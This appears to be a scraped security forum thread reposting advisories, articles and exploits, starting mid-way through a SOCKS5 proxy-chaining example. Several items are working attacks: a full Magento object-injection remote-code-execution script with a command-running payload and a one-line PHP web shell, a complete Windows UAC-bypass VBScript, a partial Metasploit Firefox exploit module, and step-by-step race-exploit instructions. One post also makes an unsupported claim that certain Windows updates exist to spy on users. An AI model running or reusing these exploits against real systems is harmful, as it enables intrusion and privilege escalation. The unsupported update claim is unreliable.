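        name = host.encode("idna")
        addr = bytes([0x03, len(name)]) + name
    return bytes([SOCKS5, 0x01, 0x00]) + addr + struct.pack(">H", port)

def parse_reply(data):
    """Decode a server reply; returns (code, text, (bound_host, bound_port))."""
    if len(data) < 4 or data[0] != SOCKS5:
        raise ValueError("not a SOCKS5 reply")
    code, atyp = data[1], data[3]
    if atyp == 0x01:
        host, end = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == 0x04:
        host, end = str(ipaddress.IPv6Address(data[4:20])), 20
    elif atyp == 0x03:
        n = data[4]
        host, end = data[5:5 + n].decode("idna"), 5 + n
    else:
        raise ValueError(f"unknown address type {atyp}")
    port = struct.unpack(">H", data[end:end + 2])[0]
    return code, REPLY.get(code, "unassigned"), (host, port)

def chain_hops(proxies, destination):
    """CONNECT targets in order: to p1 we CONNECT p2, through p1 we CONNECT p3, ...,
    through the last proxy we CONNECT the destination. The first proxy is reached directly."""
    return list(proxies[1:]) + [destination]

def open_chain(proxies, destination, timeout=10.0):
    """Establish the chain over a real socket (needs reachable proxies; not run by the test).
    The returned socket is a raw tunnel to the destination; the destination sees only the last hop."""
    sock = socket.create_connection(proxies[0], timeout)
    for host, port in chain_hops(proxies, destination):
        sock.sendall(greeting())                        # each hop gets its own handshake...
        if sock.recv(2) != bytes([SOCKS5, 0x00]):
            raise ConnectionError(f"{host}: proxy demands authentication")
        sock.sendall(connect_request(host, port))       # ...carried inside the previous hop's tunnel
        code, text, _ = parse_reply(sock.recv(262))
        if code != 0:
            raise ConnectionError(f"CONNECT {host}:{port} failed: {text}")
    return sock
```

Because every hop adds a full handshake round trip before any payload moves, the latency really is the sum of the per-hop latencies, as the article says; and because the last hop is the one that opens the final connection, a chain is only as trustworthy as its exit proxy, which sees the plaintext of anything not wrapped in TLS.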
  12. SQL Injection Optimization and Obfuscation Techniques
By Roberto Salgado

Introduction
SQL Injections are without question one of the most dangerous web vulnerabilities around. With all of our information stored in databases, almost every detail about our lives is at the mercy of a simple HTTP request. As a solution, many companies implement Web Application Firewalls and Intrusion Detection/Prevention Systems to try to protect themselves. Unfortunately, these countermeasures are not sufficient and can easily be circumvented. This is all possible due to optimization and obfuscation techniques which have been perfected over the last 15 years since the discovery of this lethal vulnerability. Even though firewalls cannot be relied on to prevent all attacks, some firewalls can be effective when used as a monitoring tool. It is not unheard of for an attacker to be detected and blocked mid-attack, due to firewall triggers and an alert security team. Because of this, a SQL Injection that has been optimized and obfuscated has a much higher probability of being successful; it will extract the data faster and remain undetected for longer. In this paper we will discuss and compare a variety of optimization methods which can be highly effective when exploiting Blind SQL Injections. We will also introduce SQL queries which can be used to dump the whole database with just one request, making it extremely easy to quickly retrieve data while going unnoticed. Furthermore, we will be reviewing several obfuscation techniques which can make a SQL Injection unrecognizable to firewalls. When combined, these techniques create a deadly attack which can be devastating.

Download: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
  13. [h=1]Mozilla Maintenance Service Log File Overwrite Elevation of Privilege[/h]

Source: https://code.google.com/p/google-security-research/issues/detail?id=427&can=1

Mozilla Maintenance Service: Log File Overwrite Elevation of Privilege
Platform: Windows
Version: Mozilla Firefox 38.0.5
Class: Elevation of Privilege

Summary:
The maintenance service creates a log file in a user writable location. It’s possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege.

Description:
When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. The directory it creates the file in has fairly permissive permissions, which allows a normal user to create new files underneath that directory. It’s possible to race the creation of the log file during the service initialization to drop a hardlink to an existing file on the same drive (which is probably the system drive) which, when opened by the maintenance service running as local system, will cause the file to be overwritten by the log data. At the very least this would corrupt the target file; however, as the user has some control over bits of the contents, such as the updater path, it’s possible to get some user controlled contents in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as powershell, batch or HTA, which subsequently gets executed by a privileged process.

The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However this isn’t a significant issue, as before opening the log file the service backs up the log to a new name, leaving the directory entry for “maintenanceservice.log” free. Therefore there’s a race condition between the log file being moved out of the way and the new log file being created.

So to exploit this you perform the following operations:
1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful.
2. In another thread start the service, passing the arbitrary content you want to insert as the path to the updater file.

A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure, which will write update.status to any location you specify. You can use a hardlink to force the file to be overwritten. In this case this would only cause file corruption, as the user has no real control over the contents.

If I could recommend fixes: either make the logs directory writable only by administrators, or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar.

Proof of Concept:
I’ve attached a proof of concept, it’s written in C#. You’ll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race.

1) Compile the PoC
2) Execute the PoC passing the name of a file you want to overwrite on the command line
3) Program should run and print Done if successful

Expected Result:
The log file is created as normal

Observed Result:
The target file has been overwritten with the contents of the log file

Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37925.zip

Sursa: https://www.exploit-db.com/exploits/37925/
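An added, constructed simulation (not code from the report or from Mozilla) of why the recommended CopyFile-style backup closes the window the report describes: it replays the backup-then-open sequence in a scratch directory against a deterministic stand-in for the low-privileged user, once with the move-based backup and once with the copy-based one. Function names, the `maintenanceservice.log` stand-in and the scratch files are assumptions; the directory-permission fix the report also mentions is the complete remedy and is not modelled here.

```python
import os
import shutil
import tempfile

LOG_NAME = "maintenanceservice.log"  # name taken from the report; files here are constructed


def backup_by_move(log_dir):
    """The pattern the report describes: the old log is renamed out of the way,
    which leaves the directory entry for LOG_NAME free until the new log is created."""
    log = os.path.join(log_dir, LOG_NAME)
    if os.path.exists(log):
        os.replace(log, log + ".bak")


def backup_by_copy(log_dir):
    """The fix the report recommends: copy the old log instead of moving it.
    The directory entry for LOG_NAME is never free, so nothing can be planted under it."""
    log = os.path.join(log_dir, LOG_NAME)
    if os.path.exists(log):
        shutil.copyfile(log, log + ".bak")


def write_log(log_dir, data):
    """The privileged service's log open: create-or-truncate by name, following
    whatever inode that name currently points at (this is what makes a hardlink dangerous)."""
    log = os.path.join(log_dir, LOG_NAME)
    with open(log, "w") as f:
        f.write(data)


def plant_hardlink(log_dir, target):
    """Stand-in for the unprivileged user's thread: try to claim the free log name as a
    hardlink to an existing file. Returns True if the name was free (attack window open)."""
    try:
        os.link(target, os.path.join(log_dir, LOG_NAME))
        return True
    except FileExistsError:
        return False


def simulate(backup):
    """Run one service restart with the given backup strategy while the planter strikes
    exactly in the window between backup and log open (deterministic, no real race).
    Returns (contents of the target file afterwards, whether the link was planted)."""
    scratch = tempfile.mkdtemp(prefix="mozlog-sim-")
    try:
        target = os.path.join(scratch, "target.txt")  # constructed victim file
        with open(target, "w") as f:
            f.write("original")
        write_log(scratch, "log from a previous run")   # a log already exists
        backup(scratch)                                  # service backs the old log up
        planted = plant_hardlink(scratch, target)        # planter acts in the window
        write_log(scratch, "log written by SYSTEM, partly user-controlled")
        with open(target) as f:
            return f.read(), planted
    finally:
        shutil.rmtree(scratch)


if __name__ == "__main__":
    print("move-based backup:", simulate(backup_by_move))
    print("copy-based backup:", simulate(backup_by_copy))
```

With the move-based backup the target file ends up holding the log text; with the copy-based backup the link attempt fails and the target is untouched.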
  14. Major changes in Firefox: the web browser will use Chrome extensions and separate processes for tabs
Aurelian Mihai - 24 aug 2015

Mozilla is preparing important changes to the Firefox web browser, breaking compatibility with the extensions used by the current version of Firefox. In addition, optimizations meant to increase perceived performance will be implemented, at the same time improving stability and the protection offered against malware threats.

Thus, the Firefox developer will replace the API used by the current collection of Firefox extensions with WebExtensions. Similar to the one used by Google Chrome and Opera, the new API allows Chrome and Opera extensions to be quickly adapted for use with Firefox. For developers, the switch to the WebExtensions format means lower costs and more ease in adapting extensions for different web browsers.

The new extension format will debut in a new, faster version of Firefox, prepared over the last two years under the project name Electrolysis. This makes the transition to a new architecture, in which the web browser is "split" into multiple processes, one for each loaded tab or extension, offering an important benefit in terms of stability and security, the only penalty being somewhat higher memory consumption.

Of course, developers who wish to keep offering extensions for Firefox will have to make changes for the jump to the new version. In addition, starting 22 September, with the release of Firefox 41, all extensions will have to be validated and authenticated with a digital signature by Mozilla, the previous extension validation system no longer being current. Fortunately, Mozilla has left enough time to adapt extensions, the switch to the new API taking place only from 15 December, with the release of Firefox 43. From that date, unmodified Firefox extensions will continue to work for 6 months, after which Mozilla will permanently remove compatibility with them.

In this transition, by far the most affected will be developers specialized in releasing extensions exclusively for the Firefox web browser. Mozilla estimates that the change will require "considerable effort" from developers who have to port their extensions to the new API, but the company believes that "the result will be well worth the effort". In exchange, in the long term, Firefox users will have even more extensions available, which developers will be able to adapt with less effort from one platform to another.

Sursa: Schimbări majore în Firefox: web browserul va folosi extensii Chrome și procese separate pentru taburi
  15. System calls in the Linux kernel. Part 1.

Introduction

This post opens a new chapter in the linux-insides book and, as you may understand from the title, this chapter will be devoted to the System call concept in the Linux kernel. The choice of topic for this chapter is not accidental. In the previous chapter we saw interrupts and interrupt handling. The concept of system calls is very similar to interrupts, because the most common way to implement system calls is as software interrupts. We will see many different aspects that are related to the system call concept. For example, we will learn what happens when a system call occurs from userspace, we will see the implementation of a couple of system call handlers in the Linux kernel, the VDSO and vsyscall concepts and many, many more. Before we start to dive into the implementation of the system-call-related code in the Linux kernel source, it is good to know some theory about system calls. Let's do it in the following paragraph.

System call. What is it?

A system call is just a userspace request for a kernel service. Yes, the operating system kernel provides many services. When your program wants to write to or read from a file, start listening for connections on a socket, delete or create a directory, or even finish its work, it uses a system call. In other words, a system call is just a C function that is placed in the kernel space, and a user program can ask the kernel to do something via this function. The Linux kernel provides a set of these functions and each architecture provides its own set. For example: x86_64 provides 322 system calls and x86 provides 358 different system calls. Ok, a system call is just a function. Let's look at a simple Hello world example written in assembly programming language:

Full article: https://github.com/0xAX/linux-insides/blob/master/SysCall/syscall-1.md
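An added example, not taken from linux-insides: it makes the two points of the passage concrete from userspace, namely that a system call is reached by number through the kernel's generic entry point (here via libc's `syscall()` rather than the glibc `write()`/`getpid()` wrappers), and that the number for the same call differs per architecture. The table and function names are this example's own; the numbers are the ones from the kernel's x86_64, i386 and arm64 syscall tables. Linux only.

```python
import ctypes
import os
import platform
import sys

# The same service has a different number on each architecture, which is why the
# chapter says each architecture provides its own set (x86_64: 322 calls, x86: 358).
# Values from the kernel syscall tables; only these two calls are needed here.
SYSCALL_TABLES = {
    "x86_64":  {"write": 1,  "getpid": 39},
    "i386":    {"write": 4,  "getpid": 20},
    "i686":    {"write": 4,  "getpid": 20},
    "aarch64": {"write": 64, "getpid": 172},
}


def syscall_number(name, machine=None):
    """Number of system call `name` for the running (or a named) architecture."""
    machine = machine or platform.machine()
    try:
        return SYSCALL_TABLES[machine][name]
    except KeyError:
        raise OSError("no syscall table entry for %s on %s" % (name, machine))


def _libc():
    """libc handle with errno tracking; raw Linux numbers mean nothing elsewhere."""
    if not sys.platform.startswith("linux"):
        raise OSError("this example issues Linux system call numbers only")
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long
    return libc


def raw_getpid():
    """Ask the kernel for our PID by number, bypassing the glibc getpid() wrapper."""
    return _libc().syscall(ctypes.c_long(syscall_number("getpid")))


def raw_write(fd, data):
    """write(2) issued by number. Returns the byte count the kernel reports,
    or raises OSError with the errno libc stored for us on a -1 result."""
    n = _libc().syscall(ctypes.c_long(syscall_number("write")),
                        ctypes.c_int(fd),
                        ctypes.c_char_p(data),
                        ctypes.c_size_t(len(data)))
    if n < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return n


def roundtrip_through_pipe(data):
    """Write through the raw syscall, read back with os.read: the kernel serviced the
    request exactly as it would have for the libc wrapper."""
    r, w = os.pipe()
    try:
        written = raw_write(w, data)
        return os.read(r, written)
    finally:
        os.close(r)
        os.close(w)


if __name__ == "__main__":
    print("arch:", platform.machine(), "getpid is #%d, write is #%d"
          % (syscall_number("getpid"), syscall_number("write")))
    print("raw getpid:", raw_getpid(), "os.getpid:", os.getpid())
    print("pipe roundtrip:", roundtrip_through_pipe(b"Hello world\n"))
```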
  16. Deanonymization Made Simple

cbcf9dde327c475d99627c87f58cab7ac6689164bf2fe7734c10c78005ed118e == sha256(“[10.08.2015] I’ve discovered that about 2% of the known darkweb is controlled by one organization.”)

Reading articles on deanonymization of hidden services by controlling certain nodes or conducting correlation attacks, I came to the idea that in certain cases it might be much easier to break anonymity. Just by having the same vulnerabilities as in “clearnet”, applications can expose sensitive information and let an attacker gather data from the system and deanonymize the target, with certain “darknet” specifics in the approach.

According to the results of the recent HyperionGray research of scanning the darkweb with PunkSPIDER, the approximate number of alive dark services is about 7000. The guys took alive and not-so-hidden services and started to scan those for serious vulnerabilities. I’ve started my own research with a slightly different approach: as opposed to searching for critical vulnerabilities like OSCI/SQLi, I’ve taken a closer look at conventionally low-risk information disclosure. For that I’ve written a simple Python script which, when provided with server/framework, would enumerate accessible files and folders and probably discover certain leaks of server information.

To my surprise, a fair amount of them actually had quite lame generic server authorization/configuration issues, up to world-readable /phpinfo.php. The most helpful and common fail pattern was, however, the default Apache pages such as /server-info and /server-status. Whereas the first one would give you a nice picture of the server information with current settings, modules and its configuration (and IP address, of course), the second is more valuable in terms of current connections. In a given set of 7k+ alive services almost 500 of them (about 7%) appeared to be vulnerable. Further analysis showed that large-traffic applications are affected, too.

For one of the websites I’ve noticed that it has several other hosts with completely different kinds of subjects. The only thing which was the same were those /server-status pages, all among them. A quick gather of references on those revealed more than 300 unique services with traffic as much as 50+ Gb per day. Interestingly enough, most of them were referenced from the HiddenWiki page, which also resided on the same server. A weaver! As appeared later, it was a hidden hosting service, where anybody could pay a certain amount of BTC and rent it for his own dark intentions.

Obviously, such disclosure makes it possible for a deanonymizer to list all the queries to a particular domain on the hosting server and view parameters with corresponding values for GET requests with full paths to closed parts of the application.

I was lucky again when my script warned me of an external IP address, which accessed “vps.server.com”. If you’ve ever had a look at the access.log of your web server, for sure you’ve noticed a lot of connections of all kinds of bots which scan the Internet for vulnerabilities. That was probably the first time in my life when I was really thankful to them. It meant the following:
- the clearnet service is also available on port 80
- if I manage to access it, my watcher script can isolate it

One of the options to hit that is to basically try to scan the whole Internet on port 80. Sounds crazy? Hold on, check these projects first: Zmap and Massscan! What’s basically needed is to access a specific IP address with a certain marker, which would identify this IP address uniquely, and monitor such access on /server-status of a target server. I assumed that probably the easiest way to do it is to use the following vector: http://xx.xx.xx.xx/xx.xx.xx.xx. Results haven’t made me wait too long:

Of course, this is not the only way to achieve that. The following scenario is even simpler: many clearnet hosts on the same server are used to redirect traffic to darknet, and this also helps a lot to deanonymize the target. One approach is quite similar to the previous one but more universal, in that you don’t really need to have control over the status page. It is enough to parse those responses which return a 30x code and check for the presence of the “.onion” string in the “Location:” header:

For the laziest of researchers, Shodan might help, too:

Finally, a researcher can always find a vulnerability in one weak service and get access to the whole hosting server. Let’s say, I believe it’s possible

Conclusion

The goal of my research was to show that often deanonymization of a hidden service (or even a network) can be done trivially by applying the same pentest approach as in clearnet. The main difference here is that usually non-critical information disclosure plays a much more significant role than for “normal” web applications. To summarize, at least the following easy ways may let a researcher deanonymize a darknet service:
- instant win (server-info, phpinfo, …)
- status page access (x.x.x.x/x.x.x.x)
- (un)expected redirect (30x clearnet to darknet)
- app-level pwnage (missing patches, vulnerabilities in the code, default framework pages…)

P.S. If you’re interested in the topic, you may also want to check TheCtulhu’s blog and find decent instructions on configuring an nginx server to host a hidden service in a more secure way.

Posted by Authorized Attacker Aug 22nd, 2015 9:44 pm

Sursa: http://antukh.com/blog/2015/08/22/dark-appsec/
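An added example from the hosting side of the post (not the author's script): a small audit of an httpd configuration that flags `server-status` / `server-info` handlers left reachable by any client, which is the "instant win" and "status page access" leak described above, beside a corrected configuration that confines them. The two configurations are constructed samples; the checker is a simplified one that reads `<Location>` blocks with Apache 2.4 `Require` (and 2.2 `Allow from`) directives and ignores `<LocationMatch>` and `RequireAny`/`RequireAll` containers.

```python
import re

# A <Location ...> ... </Location> container and its body.
LOCATION_BLOCK = re.compile(r"<Location\s+([^>]+)>(.*?)</Location>", re.I | re.S)
# The handlers whose output leaks configuration, modules and live connections.
STATUS_HANDLER = re.compile(r"^\s*SetHandler\s+(server-status|server-info)\b", re.I | re.M)
# Directives that confine the handler to trusted clients (2.4 Require, 2.2 Allow from).
RESTRICTING = re.compile(
    r"^\s*(Require\s+(local\b|ip\s|host\s|all\s+denied\b)|Allow\s+from\s+(?!all\b))",
    re.I | re.M)
# Directives that explicitly open the handler to everyone.
OPEN_TO_ALL = re.compile(r"^\s*(Require\s+all\s+granted\b|Allow\s+from\s+all\b)",
                         re.I | re.M)


def exposed_status_pages(config_text):
    """Return [(path, handler)] for every Location that publishes server-status or
    server-info without a directive restricting who may request it."""
    findings = []
    for block in LOCATION_BLOCK.finditer(config_text):
        path, body = block.group(1).strip(), block.group(2)
        handler = STATUS_HANDLER.search(body)
        if not handler:
            continue  # not a status page, nothing to report
        if OPEN_TO_ALL.search(body) or not RESTRICTING.search(body):
            findings.append((path, handler.group(1).lower()))
    return findings


# Constructed sample: the default-style blocks that answer to any client.
WEAK_CONFIG = """
ExtendedStatus On
<Location /server-status>
    SetHandler server-status
    Require all granted
</Location>
<Location /server-info>
    SetHandler server-info
</Location>
<Location /private>
    Require valid-user
</Location>
"""

# Constructed sample: the same handlers limited to localhost and an admin network.
FIXED_CONFIG = """
ExtendedStatus Off
<Location /server-status>
    SetHandler server-status
    Require local
</Location>
<Location /server-info>
    SetHandler server-info
    Require ip 10.0.0.0/8
</Location>
"""


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        print(name, "->", exposed_status_pages(cfg) or "no exposed status pages")
```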
  17. [h=3]Magento Bug Bounty 1 & 2: CSRF to code execution and Post-auth RCE via object injection[/h]

After months of procrastination and tons of words of encouragement from a good friend to start this blog I've decided to do so finally and open up with a couple of bug bounties I've been awarded with recently. I was shooting for the top bounties for Magento and landed pretty close to my goal.

Bounty #1: CSRF:

My initial thought was to check out some of the less explored areas of Magento that seemed interesting. Namely, the /downloader/ page which is used by admins to upload plugins to the Magento store either from a local package or remotely from the Magento Connect marketplace. Upon logging in I attempted to change a few settings and immediately noticed there were no CSRF tokens on any of the requests. I thought of the obvious issue, CSRF an admin and upload a malicious module, but there were a couple problems that prevented this.

Problem 1: I had no idea what the directory and file structure was like for the MagentoConnect website and googling around didn't lead to much.

Solution: Wireshark solves a lot of problems. While running a local copy I just had to find the requests being sent from my server, grab each config file being read, and mimic them on my attacker's server. After a bit of back and forth I had managed to properly emulate the community plugin page's layout on my attacker server and create a valid malicious payload.

bad.php:
<?php system($_GET[cmd]); ?>

Problem 2: The process requires multiple POST requests to install from a URL

In order for a plugin to be installed from a URL the admin needed to click "install" after the URL was entered and then "proceed", which was sent in 2 POST requests. XHR would have made this a non-issue but there was no CORS header being sent allowing this. We could have used the method described in this awesome blog post but because the "X-Frame-Options" was set to "SAMEORIGIN" it would not have worked.

NOTE: As pointed out in the comments by Mr. James Kettle this attack would actually still work even with the X-Frame-Option.

However, upon closer inspection the "A=" parameter seems to change when the install actually takes place. If we just adjust our PoC CSRF to POST to that URL instead it seems like we'd be able to install our payload with a single click from an admin. And it worked!

The bounty awarded for this bug was $9000.

Timeline:
11/17/2014 - Bug reported via the Ebay Inc. Bug Bounty portal
02/??/2015 - Report was closed
02/10/2015 - Created another bug report via the Ebay Inc. Bug Bounty portal
02/10/2015 - Request for more info by Ebay
02/23/2015 - Request for assistance with setting up PoC page
03/04/2015 - More back and forth with the engineer
04/03/2015 - Initial payment received
06/03/2015 - Final payment received
07/07/2015 - Patch is pushed

Bounty #2 PHP Object injection:

You may or may not have seen this one posted before by a much more skilled researcher and writer named Johannes Dahse, the author of the popular PHP source code analysis tool RIPS. If you have not I highly suggest reading his writeup here instead as it'll be an actual explanation with more content. I likely only reported the bug a few days earlier so kudos to him.

The bounty awarded for this issue was $2500.

Timeline:
11/21/2014 - Bug reported via the Ebay Inc. Bug Bounty portal
11/24/2014 - Patched silently in 1.9.1.0
12/18/2014 - Final payment received

PoC sent to PayPal:

#!/usr/bin/python
# Magento PoC for post auth php object injection
# pip install mechanize || easy_install mechanize
# Author: @Ebrietas0 || http://ebrietas0.blogspot.com

import sys
import re
import base64
from hashlib import md5
import mechanize


def usage():
    print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
    sys.exit()

if len(sys.argv) != 3:
    usage()

# Command-line args
target = sys.argv[1]
arg = sys.argv[2]

# Config.
username = ''
password = ''
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Sat, 15 Nov 2014 20:27:57 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, len(arg), arg)

# Setup the mechanize browser and options
br = mechanize.Browser()
br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
request = br.open(target)
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    print e.read()

Posted by Ebrietas

Sursa: http://ebrietas0.blogspot.ro/2015/08/magento-bug-bounty-1-2-csrf-to-code.html
  18. [h=1]MFFA - Media Fuzzing Framework for Android (Stagefright fuzzer)[/h]

[h=2]Project overview[/h]

The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played, and monitor the system for potential issues (i.e. system crashes) that may lead to exploitable vulnerabilities. Custom developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted out, in an attempt to find only the unique issues, using a custom built triage mechanism.

Link: https://github.com/fuzzing/MFFA
  19. Do NOT install these updates:

1. https://support.microsoft.com/en-us/kb/3075249
2. https://support.microsoft.com/en-us/kb/3080149

Their purpose is the same as on Windows 10 - to send various information to Microsoft's servers.
  20. [h=1]UAC Bypass Vulnerability in Windows Script Host[/h]

The Windows Script Host executables suffer from a vulnerability due to a missing embedded manifest. This allows the script host executables to be copied to another system directory and allows a manifest to be applied to the executable. This manifest allows the script host to be executed with administrative rights.

Both ZDI and Microsoft are aware of this issue; expectedly ZDI didn't accept the submission because it's not a remote vulnerability. Surprisingly Microsoft didn't accept the vulnerability because "UAC isn't considered a security boundary".

Only Windows 7 is vulnerable, Windows 8 has an embedded manifest and Windows 10 is untested.

Option Explicit

Dim HOST_MANIFEST: HOST_MANIFEST = _
    "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
    "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
    "          xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _
    "          manifestVersion=""1.0"">" & vbCrLf & _
    "  <asmv3:trustInfo>" & vbCrLf & _
    "    <security>" & vbCrLf & _
    "      <requestedPrivileges>" & vbCrLf & _
    "        <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _
    "      </requestedPrivileges>" & vbCrLf & _
    "    </security>" & vbCrLf & _
    "  </asmv3:trustInfo>" & vbCrLf & _
    "  <asmv3:application>" & vbCrLf & _
    "    <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _
    "      <autoElevate>true</autoElevate>" & vbCrLf & _
    "      <dpiAware>true</dpiAware>" & vbCrLf & _
    "    </asmv3:windowsSettings>" & vbCrLf & _
    "  </asmv3:application>" & vbCrLf & _
    "</assembly>"

Function CanBypass()
    Dim KEY_NAME: KEY_NAME = _
        "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\" & _
        "Policies\System\ConsentPromptBehaviorAdmin"
    Dim oWs: Set oWs = CreateObject("WScript.Shell")
    CanBypass = Not CBool(oWs.RegRead(KEY_NAME) And 2)
End Function

Sub Copy(ByVal sSource, ByVal sTarget)
    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
    Dim oWs: Set oWs = CreateObject("WScript.Shell")
    Dim sTempFile: sTempFile = GetTempFilename()
    oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
    oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
    oFso.DeleteFile sTempFile
End Sub

Sub Elevate()
    Const WINDIR = "%windir%"
    If Not CanBypass() Then
        Message "User will get warnings...", vbInformation
        ' Exit Sub
    End If
    Dim oWs: Set oWs = CreateObject("WScript.Shell")
    Dim sPath: sPath = Left(WScript.ScriptFullName, _
        InStrRev(WScript.ScriptFullName, "\"))
    Dim sHost: sHost = Right(WScript.FullName, 11)
    Dim sManifest: sManifest = sPath & sHost & ".manifest"
    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
    Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
    oStream.Write HOST_MANIFEST
    oStream.Close
    Copy sManifest, WINDIR
    Copy WScript.FullName, WINDIR
    oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART"
    oFso.DeleteFile sManifest
End Sub

Function GetTempFilename()
    Const vbTemporaryFolder = 2
    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
    Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
    GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
End Function

Function HasAdmin()
    Const VALUE = "RandomValue"
    Const KEYNAME = "HKLM\SOFTWARE\Microsoft\RandomKey"
    On Error Resume Next : Err.Clear
    Dim oWs: Set oWs = CreateObject("WScript.Shell")
    oWs.RegWrite KEYNAME, VALUE
    Call oWs.RegRead(KEYNAME)
    oWs.RegDelete KEYNAME
    HasAdmin = CBool(Err.Number = 0)
End Function

Function Message(ByVal sMessage, ByVal iFlags)
    Message = MsgBox(sMessage, vbSystemModal Or iFlags, WScript.ScriptName)
End Function

Sub RunAsAdmin()
    If HasAdmin() Then
        Message "Elevated to admin, ...", vbInformation
    Else
        Message "Failed... no admin", vbExclamation
    End If
End Sub

If WScript.Arguments.Named.Exists("RESTART") Then
    RunAsAdmin
ElseIf HasAdmin() Then
    Message "U Wot M8? This is a elevation test and we're already admin!", vbCritical
Else
    Elevate
End If

Sursa: https://github.com/Vozzie/uacscript
  21. Firefox PDF.js Privileged Javascript Injection
Authored by temp66, joev, Marius Mlynski | Site metasploit.com

This Metasploit module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Firefox PDF.js Privileged Javascript Injection',
      'Description'    => %q{
        This module gains remote code execution on Firefox 35-36 by abusing a
        privilege escalation bug in resource:// URIs. PDF.js is used to exploit
        the bug. This exploit requires the user to click anywhere on the page to
        trigger the vulnerability.
      },
      'Author'         => [
        'Unknown',        # PDF.js injection code was taken from a 0day
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev'            # copypasta monkey, CVE-2015-0802
      ],
      'DisclosureDate' => "Mar 31 2015",
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2015-0816'], # pdf.js can load chrome://
        ['CVE', '2015-0802']  # can access messageManager property in chrome window
      ],
      'Targets'        => [
        [ 'Universal (Javascript XPCOM Shell)', {
          'Platform' => 'firefox',
          'Arch'     => ARCH_FIREFOX
        } ],
        [ 'Native Payload', {
          'Platform' => %w{ java linux osx solaris win },
          'Arch'     => ARCH_ALL
        } ]
      ],
      'DefaultTarget'  => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(35, 36) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
